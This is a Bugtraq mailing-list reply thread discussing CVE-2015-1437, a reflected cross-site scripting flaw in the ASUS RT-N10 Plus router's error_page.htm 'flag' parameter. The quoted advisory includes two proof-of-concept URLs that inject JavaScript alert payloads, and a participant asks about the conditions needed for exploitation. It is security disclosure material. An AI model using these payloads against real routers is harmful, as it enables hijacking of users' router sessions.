Bugtraq mailing list archives

Re: CVE-2015-1437 XSS In ASUS Router.

From: Darko Vršič <darko () varnost si>
Date: Wed, 04 Feb 2015 15:44:38 +0100

On 02/04/2015 02:44 PM, Michael Meyer wrote:

*** kingkaustubh () me com wrote:

#####################################
Title:-   Reflected XSS vulnarbility in Asus RT-N10 Plus router
Author:   Kaustubh G. Padwad
Product:  ASUS Router RT-N10 Plus
Firmware: 2.1.1.1.70
Severity: HIGH
Auth:     Not requierd
CVE ID:   CVE-2015-1437
# Description:
Vulnerable Parameter: flag=
# Vulnerability Class:
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

[...]

Enter this URL
1.http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d
2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d

https://sintonen.fi/advisories/asus-router-auth-bypass.txt

Micha

So it's only vulnerable if WEB access is open to the internet, orattacker is in LAN?


Darko

Current thread:

CVE-2015-1437 XSS In ASUS Router. kingkaustubh (Feb 03)
- Re: CVE-2015-1437 XSS In ASUS Router. Henri Salo (Feb 04)
- Re: CVE-2015-1437 XSS In ASUS Router. Michael Meyer (Feb 04)
  - Re: CVE-2015-1437 XSS In ASUS Router. Darko Vršič (Feb 04)
- <Possible follow-ups>
- Re: Re: CVE-2015-1437 XSS In ASUS Router. kingkaustubh (Feb 04)